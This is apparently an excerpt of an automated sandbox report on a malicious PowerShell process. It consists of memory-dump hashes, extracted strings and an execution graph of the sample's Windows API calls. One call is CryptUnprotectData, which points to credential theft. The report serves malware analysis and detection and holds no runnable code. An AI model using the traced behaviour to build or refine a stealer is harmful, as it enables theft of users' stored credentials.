                                                                                                    • Opcode Fuzzy Hash: 45f7f230fa7f86f016295c99277a0017fe52bf5b58dec1b95d98aa2faad076b8
                                                                                                    • Instruction Fuzzy Hash: F95104B4E15218CFDB14CFA4D948BEDBBF6BB4A384F14502AE80AA7350C7785986CF45
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632294203.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c3d745c04ca09be63eb0d1abe01af60f6f7d58868a1490eb9fb27c750c61fc6d
                                                                                                    • Instruction ID: 40c404cf68c18bca9dc33c348019e41dfb05f1127767475cabb2a52a25fe8638
                                                                                                    • Opcode Fuzzy Hash: c3d745c04ca09be63eb0d1abe01af60f6f7d58868a1490eb9fb27c750c61fc6d
                                                                                                    • Instruction Fuzzy Hash: 2151A6B4D05628CFEB64DF66C858799BBF2BF89304F1485E9C40DA7264DB341A89CF01
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632435470.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f18533d3a84dd332feb68d8c95d75e2114080a3701ed4f0405c8b19ebf74d4ab
                                                                                                    • Instruction ID: 43b2a9fae91d51683bdcc0c662abf2ca6233b647ab709db8611e0145aafd9fd4
                                                                                                    • Opcode Fuzzy Hash: f18533d3a84dd332feb68d8c95d75e2114080a3701ed4f0405c8b19ebf74d4ab
                                                                                                    • Instruction Fuzzy Hash: 2351BAB1E006199BEB18CF6BCC4069EFAF7BFC9300F18C1B9D519AA255DB3059828F50
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632435470.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b637f0cbe3c36b268bd57418e47d81c3cb69ba671f9986be34e6b6988d501e56
                                                                                                    • Instruction ID: a71f6ad81f73ed61a5003aca8badf99a76a79b463bbbc113d760ddf6d4c29ccf
                                                                                                    • Opcode Fuzzy Hash: b637f0cbe3c36b268bd57418e47d81c3cb69ba671f9986be34e6b6988d501e56
                                                                                                    • Instruction Fuzzy Hash: CF4148B5E016599BDB08CFABC94059EFBF3AFC8310F18C07AD559AB224DB3059468F54
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632294203.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 554e9b72e06eceed8b94f6603d7a06810529cc777b3f3bd26da040c2995d872f
                                                                                                    • Instruction ID: 5473d991217d548715cf4c55bf511a589bc6a3902a5b2907707649c81d3f6a6a
                                                                                                    • Opcode Fuzzy Hash: 554e9b72e06eceed8b94f6603d7a06810529cc777b3f3bd26da040c2995d872f
                                                                                                    • Instruction Fuzzy Hash: 315196B0D056688FEB64DF66CC58799BBF2AF89304F14C5EAC40DA7265DB341A89CF01
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632435470.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ccdc969cd90c387f7f2d1b69e0bbe815aec957285360db9b3cc9cec26af1eea3
                                                                                                    • Instruction ID: 2615b09cdae8d20224e13c6587855a4dd5d492d650eb75e68ddba61243c54efd
                                                                                                    • Opcode Fuzzy Hash: ccdc969cd90c387f7f2d1b69e0bbe815aec957285360db9b3cc9cec26af1eea3
                                                                                                    • Instruction Fuzzy Hash: B031AEB1E056589FD71ACF6B8C412D9FBF7AFC9200F08C0FA944DA6255EA740A468F11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632435470.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 219ed9f1c604132342953a870fc48d91ec5c0eae0ae9db4ad0b71ab1e132d7a5
                                                                                                    • Instruction ID: 7e36e3aa0bfd17bec3249f9a908f4939668edd8543f601d636d215de01465ea1
                                                                                                    • Opcode Fuzzy Hash: 219ed9f1c604132342953a870fc48d91ec5c0eae0ae9db4ad0b71ab1e132d7a5
                                                                                                    • Instruction Fuzzy Hash: 1F31BEB1E056149BEB1ECF678841699FAF7AFC9300F04C0FA944CAA255EA740A458F51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632435470.00000000076A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076A0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_76a0000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ba0ea7ae654e96539f559a1b44e32b40998762f6d6546b55f848881903e9bb1a
                                                                                                    • Instruction ID: 71943b207875fcddd0313a776518afa4b99785ecbb5f388da8472c5236e68983
                                                                                                    • Opcode Fuzzy Hash: ba0ea7ae654e96539f559a1b44e32b40998762f6d6546b55f848881903e9bb1a
                                                                                                    • Instruction Fuzzy Hash: F031A2B1E156189BDB1DCF678D01699F6FBBFC9300F04D0BA944D66254EB700A418F11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600244599.0000000003650000.00000040.00000800.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1bd1c6304500681f5af4a3d1286f034d1df834247426d899873b2fb00bccf014
                                                                                                    • Instruction ID: 97099236cce66aa96a453318fe7a4281a5e14fc97423d816ccab9fffe5de0714
                                                                                                    • Opcode Fuzzy Hash: 1bd1c6304500681f5af4a3d1286f034d1df834247426d899873b2fb00bccf014
                                                                                                    • Instruction Fuzzy Hash: BF11A13AE223D5DFD309DE34C80A2023FE6AFA12147E9447ED903CA567F63448658F88
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600244599.0000000003650000.00000040.00000800.00020000.00000000.sdmp, Offset: 03650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_3650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7ee631b25209cc8a8ebfc4f565497cdd0c47b5b74da14ad54868587a9fb25503
                                                                                                    • Instruction ID: 888736c8df91d43daebe33d80a3f13ea3a4bc11b99e80bca503db09627bd234c
                                                                                                    • Opcode Fuzzy Hash: 7ee631b25209cc8a8ebfc4f565497cdd0c47b5b74da14ad54868587a9fb25503
                                                                                                    • Instruction Fuzzy Hash: 32014B3AE253D5CBC355DE38D4021867FA0EE546107A5197FD842CA5A2F36042658F88
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632030205.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7660000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e135ac7b2e8cc08ed79dcd39176a2f9b7deda6ec444f366504a9a1be8b5cbf68
                                                                                                    • Instruction ID: 7ad353ee3d6b2e46ae2463428fa2fd43dd096d8847d51c5f667e57d30cc5b828
                                                                                                    • Opcode Fuzzy Hash: e135ac7b2e8cc08ed79dcd39176a2f9b7deda6ec444f366504a9a1be8b5cbf68
                                                                                                    • Instruction Fuzzy Hash: DAF0CD70D06206DFC304CF68D4997AEBBB0AB06305F8490A5D017EB652C338C905CF41
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$TQcq$TQcq$TQcq$tP^q$tP^q
                                                                                                    • API String ID: 0-3054499449
                                                                                                    • Opcode ID: 9fae9bb55d58d7f8164e78982466b9fe097333829810839fc367e371b57feed7
                                                                                                    • Instruction ID: 8aac042edeea0d43e211f21347da4202c034155fd54535dc76b07ae70261f8b3
                                                                                                    • Opcode Fuzzy Hash: 9fae9bb55d58d7f8164e78982466b9fe097333829810839fc367e371b57feed7
                                                                                                    • Instruction Fuzzy Hash: 516108B1B40249CFDF189F6884846AAFBA3BB95310F248459EC419F398CB71DD85CBB1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-3732357466
                                                                                                    • Opcode ID: 089671b1cac65fa535ac9c541b02e9a954bacd1c7a87262e25a5a29eb88baf3f
                                                                                                    • Instruction ID: df54875a2606f1ccfdb045807e018f7451898c1059d80366df421e397e99539a
                                                                                                    • Opcode Fuzzy Hash: 089671b1cac65fa535ac9c541b02e9a954bacd1c7a87262e25a5a29eb88baf3f
                                                                                                    • Instruction Fuzzy Hash: 9241F6B1B1422ACFDF298E79C854A69FFE1ABC1610F14C66ADC019F249CF32C845C761
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                    • API String ID: 0-723292480
                                                                                                    • Opcode ID: ff457f4d4c16b8cd59aa87f4d293db630dbcb1d25b920abd71d888b08779ae5a
                                                                                                    • Instruction ID: 1693e447ca2a1b777072655b64702dc6ca95f8b56ac635964f81a67b35bbfb42
                                                                                                    • Opcode Fuzzy Hash: ff457f4d4c16b8cd59aa87f4d293db630dbcb1d25b920abd71d888b08779ae5a
                                                                                                    • Instruction Fuzzy Hash: 2651A370A402059FC708DF79C9506AEBBF7BFC8300F148929C44A9B3A9DF35D94A87A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2631935897.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7650000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (bq$(bq$Hbq$Hbq$huM%
                                                                                                    • API String ID: 0-1853806739
                                                                                                    • Opcode ID: b319d2e2f607a31c7770b5adf832cd203f179c14e03ad97b5d9487bdc9c00283
                                                                                                    • Instruction ID: 7cb70dbce51b6cd60dedc3a03793d66f0984305360a7d410afb74cfa1022e95e
                                                                                                    • Opcode Fuzzy Hash: b319d2e2f607a31c7770b5adf832cd203f179c14e03ad97b5d9487bdc9c00283
                                                                                                    • Instruction Fuzzy Hash: 36E1B0746005159FCB05DF68C880AAEBBF6FF84314F1586A9E8068B3A5DB34ED46CBD1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-3272787073
                                                                                                    • Opcode ID: 235a7d7b364af220ac6ac999005762bdb4ab7caef35a1bf15c8c260b1757a985
                                                                                                    • Instruction ID: ceafaefce2d28d1788c8fa0751e4e0ba398e7040bb6aab25fa1ff3d5f0602666
                                                                                                    • Opcode Fuzzy Hash: 235a7d7b364af220ac6ac999005762bdb4ab7caef35a1bf15c8c260b1757a985
                                                                                                    • Instruction Fuzzy Hash: EAC103B1B00316DFCF248B28D8406AAFBE6AF85710F18847ADD45DF265EA31D946CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2632294203.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $!$&$($`
                                                                                                    • API String ID: 0-132577986
                                                                                                    • Opcode ID: 1a006c2f28c6fd3503e971f896c78ca3ff43767d047938d473c476ddd7b3824a
                                                                                                    • Instruction ID: e5323108e240d6f0475bfaa7cc9fb7f0adb68e73e486c1623c056fdfc25a6a09
                                                                                                    • Opcode Fuzzy Hash: 1a006c2f28c6fd3503e971f896c78ca3ff43767d047938d473c476ddd7b3824a
                                                                                                    • Instruction Fuzzy Hash: 4AA1C5B4902269CFDBA0DF69C998B9DBBB1BB09301F1481D9E40AA7351DB709EC4CF54
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-3272787073
                                                                                                    • Opcode ID: 4e38c074467f227ce27cdeef72bf44d64aa2c7d1d8f90a15fc5ffbedd00a7fb2
                                                                                                    • Instruction ID: 9d469c331ee122a4db086570d9cc813cb37c8a11d78c66f4ca521001ce033159
                                                                                                    • Opcode Fuzzy Hash: 4e38c074467f227ce27cdeef72bf44d64aa2c7d1d8f90a15fc5ffbedd00a7fb2
                                                                                                    • Instruction Fuzzy Hash: 454115F5B4431B8FDF295A39491026AFBA6BB95210F24547FC8818F255EE32C84AC752
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-3272787073
                                                                                                    • Opcode ID: 8493c44a7bdeee39d354732bdcd71d9306d8fd883e88cd8fbfc0dd54c25b4960
                                                                                                    • Instruction ID: 92af523ebb44bc00ef0a960f12aafa14b0a0f792dbfe810d6e5ea34a9dacc3b0
                                                                                                    • Opcode Fuzzy Hash: 8493c44a7bdeee39d354732bdcd71d9306d8fd883e88cd8fbfc0dd54c25b4960
                                                                                                    • Instruction Fuzzy Hash: C44158F5B4420ACFEF298E64D5B427AFBE6AB81210F24446ACC458F284DF31E845C762
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600395362.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4e20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                    • API String ID: 0-1420252700
                                                                                                    • Opcode ID: a62ee46d5b1a34f1e10ce0791ac58459ba3e58a79977128f812795f8cf8235f3
                                                                                                    • Instruction ID: b103f2690faa37810dca7c59b42e5263db6b90a32f276d8add630ef44f8d2c31
                                                                                                    • Opcode Fuzzy Hash: a62ee46d5b1a34f1e10ce0791ac58459ba3e58a79977128f812795f8cf8235f3
                                                                                                    • Instruction Fuzzy Hash: 30E1A074A402598FDB24DB18C994B9EB7B2FB84304F5094E8D9096F355CB31EE86CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2600395362.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_4e20000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                    • API String ID: 0-1420252700
                                                                                                    • Opcode ID: 2237ccc07b86e92aa155ecd286301c59dcc3ad729b91a45779cc2592e845fc91
                                                                                                    • Instruction ID: df8dc654c9dea66c0dde6dc1a063c7e114a31b7f174b4f45d151704687358c0f
                                                                                                    • Opcode Fuzzy Hash: 2237ccc07b86e92aa155ecd286301c59dcc3ad729b91a45779cc2592e845fc91
                                                                                                    • Instruction Fuzzy Hash: 4FC13C74A002198FDB64EB18C944B9ABBB6BF84304F5085E4D909AF355CF71EE86CF91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (ztq$XRcq$XRcq$XRcq
                                                                                                    • API String ID: 0-2300712528
                                                                                                    • Opcode ID: e629b1235a4112d2f0aa1c2897bb5395ec83f37d2b0fe16cdca5463b2bb190d6
                                                                                                    • Instruction ID: 7b66f9812973668f9528416cb1f8d18f4408d3c2eb59597246d14c20fa81c2af
                                                                                                    • Opcode Fuzzy Hash: e629b1235a4112d2f0aa1c2897bb5395ec83f37d2b0fe16cdca5463b2bb190d6
                                                                                                    • Instruction Fuzzy Hash: A27113B1704209DFCF249B68D800B6AFBA6AFC5311F18846AEC45DF291DB36DD45C7A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                    • API String ID: 0-3859475322
                                                                                                    • Opcode ID: 1ee0aa1a95bae032b3a7e25e18b605c2c92abbffd5c3659d7e16fd9808c009ef
                                                                                                    • Instruction ID: f5be9e50f2778abb42833d08b4b3325649e0ce398f689ddb3621e838c55b45e8
                                                                                                    • Opcode Fuzzy Hash: 1ee0aa1a95bae032b3a7e25e18b605c2c92abbffd5c3659d7e16fd9808c009ef
                                                                                                    • Instruction Fuzzy Hash: 6461F870B402299FCF159F68845466AFFE2BBD9310F14C666D8868F3A1DB31DC46CB91
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                    • API String ID: 0-2125118731
                                                                                                    • Opcode ID: ed5be3ba73275a9938032a1e60ad47c2f74e279d776a455de35e786b26baec94
                                                                                                    • Instruction ID: 480b43d219a5ae587ab5d04ea729399532c8796f0d8e1438e1f5cf396fd9abe4
                                                                                                    • Opcode Fuzzy Hash: ed5be3ba73275a9938032a1e60ad47c2f74e279d776a455de35e786b26baec94
                                                                                                    • Instruction Fuzzy Hash: 332144B23043165BDF385A2E9C04F27FBDA9BC4714F64842AAD49CF386DD36D9418361
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2635430607.0000000007D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D50000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_7d50000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                    • API String ID: 0-2049395529
                                                                                                    • Opcode ID: c08da7541d99b73c5d98c6118985c8291d43c0993cd73c432eba3b7cf6f1c49b
                                                                                                    • Instruction ID: fad6115ae5086b4fec17e0c5e2ecfcf96d3b21c4d3cb386797e909680a1fcf22
                                                                                                    • Opcode Fuzzy Hash: c08da7541d99b73c5d98c6118985c8291d43c0993cd73c432eba3b7cf6f1c49b
                                                                                                    • Instruction Fuzzy Hash: 5801F9F1B493494FCB2A523818249656BF36BC3650B5905ABC481CF3AFDD218D49C3A3

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:20.6%
                                                                                                    Total number of Nodes:311
                                                                                                    Total number of Limit Nodes:25
                                                                                                    execution_graph 13839 408900 13841 40890f 13839->13841 13840 408bb5 ExitProcess 13841->13840 13842 408b9e 13841->13842 13843 408924 GetCurrentProcessId GetCurrentThreadId 13841->13843 13852 443120 13842->13852 13845 408949 13843->13845 13846 40894d SHGetSpecialFolderPathW GetForegroundWindow 13843->13846 13845->13846 13847 408a0e 13846->13847 13847->13842 13849 40b8e0 FreeLibrary 13847->13849 13850 40b8fc 13849->13850 13851 40b901 FreeLibrary 13850->13851 13851->13842 13855 444700 13852->13855 13854 443125 FreeLibrary 13854->13840 13856 444709 13855->13856 13856->13854 13858 40d102 13860 40d10e 13858->13860 13861 40d124 13858->13861 13859 40d16e 13878 426dd0 13859->13878 13860->13861 13938 4431a0 LdrInitializeThunk 13860->13938 13861->13859 13939 4431a0 LdrInitializeThunk 13861->13939 13865 40d1a6 13893 427540 13865->13893 13867 40d1c2 13901 429410 13867->13901 13869 40d200 13914 429e10 13869->13914 13875 40d23a 13876 439230 6 API calls 13875->13876 13877 40d25f 13876->13877 13879 426e50 13878->13879 13879->13879 13880 426eb8 RtlExpandEnvironmentStrings 13879->13880 13882 426f10 13880->13882 13881 4272a5 13940 4231d0 13881->13940 13882->13881 13884 426f75 RtlExpandEnvironmentStrings 13882->13884 13887 426fc0 13882->13887 13889 4270f0 13882->13889 13892 426f9f 13882->13892 13884->13881 13884->13887 13884->13889 13884->13892 13886 427251 GetLogicalDrives 13890 446320 LdrInitializeThunk 13886->13890 13887->13887 13888 446320 LdrInitializeThunk 13887->13888 13891 4270e1 13888->13891 13889->13886 13889->13889 13890->13892 13891->13881 13891->13889 13891->13892 13892->13865 13894 4275f0 13893->13894 13894->13894 13895 427611 RtlExpandEnvironmentStrings 13894->13895 13896 427670 13895->13896 13896->13896 13897 4276ee 13896->13897 13899 4276cd RtlExpandEnvironmentStrings 13896->13899 13900 4277a8 13896->13900 13960 420f80 13897->13960 13899->13897 13899->13900 13900->13867 13902 42943c 13901->13902 13903 429740 13901->13903 13907 429452 13901->13907 13911 42978b 13901->13911 13902->13869 13976 443140 13903->13976 13906 429877 13906->13869 13907->13903 13907->13906 13907->13911 13964 445290 13907->13964 13968 4456d0 13907->13968 13909 4431a0 LdrInitializeThunk 13909->13911 13911->13906 13911->13909 13912 445290 LdrInitializeThunk 13911->13912 13983 445360 13911->13983 13991 445ca0 13911->13991 13912->13911 13915 429e30 13914->13915 13918 429e8e 13915->13918 14006 4431a0 LdrInitializeThunk 13915->14006 13916 40d209 13922 42a2d0 13916->13922 13918->13916 13921 429fae 13918->13921 14007 4431a0 LdrInitializeThunk 13918->14007 13919 441620 RtlFreeHeap 13919->13916 13921->13919 14008 42a2f0 13922->14008 13938->13861 13939->13859 13952 4461d0 13940->13952 13942 4238ea 13943 423210 13943->13942 13950 423265 13943->13950 13956 4431a0 LdrInitializeThunk 13943->13956 13945 4238cc 13946 441620 RtlFreeHeap 13945->13946 13947 4238dc 13946->13947 13947->13942 13958 4431a0 LdrInitializeThunk 13947->13958 13950->13945 13951 441620 RtlFreeHeap 13950->13951 13957 4431a0 LdrInitializeThunk 13950->13957 13951->13950 13953 4461f0 13952->13953 13954 4462ce 13953->13954 13959 4431a0 LdrInitializeThunk 13953->13959 13954->13943 13956->13943 13957->13950 13958->13947 13959->13954 13961 420fc0 13960->13961 13961->13961 13962 4231d0 2 API calls 13961->13962 13963 420ff9 13962->13963 13963->13900 13965 4452b0 13964->13965 13966 44532f 13965->13966 13999 4431a0 LdrInitializeThunk 13965->13999 13966->13907 13969 4456e5 13968->13969 13973 4456fe 13968->13973 13969->13973 14000 4431a0 LdrInitializeThunk 13969->14000 13970 445981 13970->13907 13972 441620 RtlFreeHeap 13972->13970 13973->13970 13975 4457cf 13973->13975 14001 4431a0 LdrInitializeThunk 13973->14001 13975->13972 13977 443185 13976->13977 13978 443166 13976->13978 13979 443158 13976->13979 13981 44317a 13976->13981 13980 441620 RtlFreeHeap 13977->13980 13982 44316b RtlReAllocateHeap 13978->13982 13979->13977 13979->13978 13980->13981 13981->13911 13982->13981 13984 445390 13983->13984 13987 44545a 13984->13987 14002 4431a0 LdrInitializeThunk 13984->14002 13985 445648 13985->13911 13987->13985 13990 44558a 13987->13990 14003 4431a0 LdrInitializeThunk 13987->14003 13988 441620 RtlFreeHeap 13988->13985 13990->13988 13992 445caf 13991->13992 13995 445dbe 13992->13995 14004 4431a0 LdrInitializeThunk 13992->14004 13993 446045 13993->13911 13995->13993 13998 445f4e 13995->13998 14005 4431a0 LdrInitializeThunk 13995->14005 13996 441620 RtlFreeHeap 13996->13993 13998->13996 13999->13966 14000->13973 14001->13975 14002->13987 14003->13990 14004->13995 14005->13998 14006->13918 14007->13921 14009 42a340 14008->14009 14009->14009 14014 441660 14009->14014 14015 44167e 14014->14015 14017 44169e 14014->14017 14015->14017 14026 4431a0 LdrInitializeThunk 14015->14026 14019 42a39e 14017->14019 14021 44175e 14017->14021 14027 4431a0 LdrInitializeThunk 14017->14027 14018 441620 RtlFreeHeap 14018->14019 14022 441880 14019->14022 14021->14018 14023 42a3f0 14022->14023 14024 44188d 14022->14024 14024->14023 14028 4431a0 LdrInitializeThunk 14024->14028 14026->14017 14027->14021 14028->14023 13754 40e6ca 13760 409880 13754->13760 13756 40e6d1 CoUninitialize 13757 40e710 13756->13757 13758 40eb42 CoUninitialize 13757->13758 13759 40eb80 13758->13759 13761 409894 13760->13761 13761->13756 14029 416c8d 14032 416ca0 14029->14032 14030 416e49 CryptUnprotectData 14031 416e73 14030->14031 14032->14030 14033 43478f 14034 4347d8 SysAllocString 14033->14034 14036 434a27 14034->14036 13762 4313cd 13764 431410 13762->13764 13763 4314ee 13764->13763 13766 4431a0 LdrInitializeThunk 13764->13766 13766->13763 14037 443e8a GetForegroundWindow 14041 445150 14037->14041 14039 443e96 GetForegroundWindow 14040 443ea5 14039->14040 14042 445165 14041->14042 14042->14039 14043 40f512 CoInitializeEx CoInitializeEx 14044 411c93 14045 411cb3 14044->14045 14046 4120cd RtlExpandEnvironmentStrings 14045->14046 14050 40feae 14045->14050 14047 41213b 14046->14047 14048 4121de RtlExpandEnvironmentStrings 14047->14048 14047->14050 14048->14050 14051 41225a 14048->14051 14052 416530 14051->14052 14053 416550 14052->14053 14053->14053 14054 4461d0 LdrInitializeThunk 14053->14054 14057 4166ad 14054->14057 14055 4166cf 14056 416705 14055->14056 14062 416922 14055->14062 14065 41672f 14055->14065 14068 416744 